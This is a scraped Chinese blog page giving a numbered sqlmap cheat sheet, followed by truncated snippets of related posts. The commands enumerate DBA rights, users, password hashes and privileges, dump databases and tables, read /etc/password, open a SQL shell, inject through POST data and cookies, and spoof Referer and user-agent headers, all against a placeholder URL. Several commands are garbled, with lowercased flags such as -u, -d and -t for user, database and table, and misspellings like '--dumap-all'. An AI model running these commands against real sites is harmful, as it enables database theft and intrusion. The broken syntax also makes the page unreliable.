sqlmap指定cookie sqlmap語法

2021-10-13 11:42:31 字數 2537 閱讀 4005

1)判斷當前使用者是否是dba

python sqlmap.py -u "url" --is-dba -v 1

2)--users:列出資料庫管理系統使用者

python sqlmap.py -u "url" --users -v 0

3)--passwords:資料庫使用者密碼(hash)

python sqlmap.py -u "url" --passwords -v 0

python sqlmap.py -u "url" --passwords -u sa -v 0

4)檢視使用者許可權

python sqlmap.py -u "url" --privileges -v 0

python sqlmap.py -u "url" --privileges -u postgres -v 0

5)--dbs可以利用的資料庫

python sqlmap.py -u "url" --dbs -v 0

6)--tables列資料庫表

python sqlmap.py -u "url" --tables -d "information_scheam"

-d:指定資料名稱

7)--columns 列出表中的列名

python sqlmap.py -u "url" --columns -t "user" -d "mysql" -v 1

-t:指定表名,-d:指定庫名

8)--dump列表中指定列的內容

python sqlmap.py -u "url" --dump -t "users" -d "testdb"

-c:可以指定字段

指定列的範圍為2到4

python sqlmap.py -u "url" --dump -t "users" -d "testdb" --start 2 --stop 4 -v 0

9)--dumap-all列出所有資料庫,所有表內容

python sqlmap.py -u "url" --dump-all -v 0

只列出使用者自己新建的資料庫和表的內容

python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0

10)--file讀取檔案內容[load_file()函式]

python sqlmap.py -u "url" --file /etc/password

11)執行sql

python sqlmap.py -u "url" --sql-shell

12)-p 指定引數

python sqlmap.py -u "url" -v 1 -p "id"

-p可以指定多引數-p "cat,id"

13)post提交

python sqlmap.py -u "url" --method post --data "id=1"

14)cookie提交

python sqlmap.py -u "url" --cookie "id=1" -v 1

cookie值可以由tamperdata抓取

15)refer欺騙

python sqlmap.py -u "url" --refer "url" -v 3

16)使用自定義user-agent或者user-agents.txt

python sqlmap.py -u "url" --user-agent "mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)" -v 3

python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"

17)使用多執行緒猜解

python sqlmap.py -u "url" -v 1 --current-user --threads 3

18)指定資料庫,繞過sqlmap的自動檢測

python sqlmap.py -u "url" -v 2 --dbms "postgresql"

19)指定作業系統繞過sqlmap自動檢測

python sqlmap.py -u "url" -v 2 --os "windows"

20)--prefix and --postfix自定義payload

python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"

21)union注入測試

python sqlmap.py -u "url" --union-test -v -1

22)配合order by

python sqlmap.py -u "url" --union-test --union-tech orderby -v 1

23)python sqlmap.py -u "url" -v 1 --union-use --banner

24)python sqlmap.py -u "url" -v 5 --union-use --current-user

25)python sqlmap.py -u "url" -v 1 --union-use --dbs

js常用獲取指定cookies方法

一般關於js讀取cookie方法有很多,下面的例項函式主要是利用split函式來分切,和document.cookie獲取所有cookie再利用for遍歷所有陣列,判斷如果cookie名相同,那麼這個cookie 就是我們要找的。方法一 如下 var acookie document.cookie....

sqlmap學習(八)指定位置注入

p 指定引數進行掃瞄,不是掃瞄所有引數,這樣可以避免浪費時間到非注入點引數上,從而提高掃瞄效率。python sqlmap.py u url p id,user agent skip跳過指定引數掃瞄,和 p作用相反,它用來跳過需要掃瞄的引數。python sqlmap.py u url skip i...

sqlmap學習(八)指定位置注入

p 指定引數進行掃瞄,不是掃瞄所有引數,這樣可以避免浪費時間到非注入點引數上,從而提高掃瞄效率。python sqlmap.py u url p id,user agent skip跳過指定引數掃瞄,和 p作用相反,它用來跳過需要掃瞄的引數。python sqlmap.py u url skip i...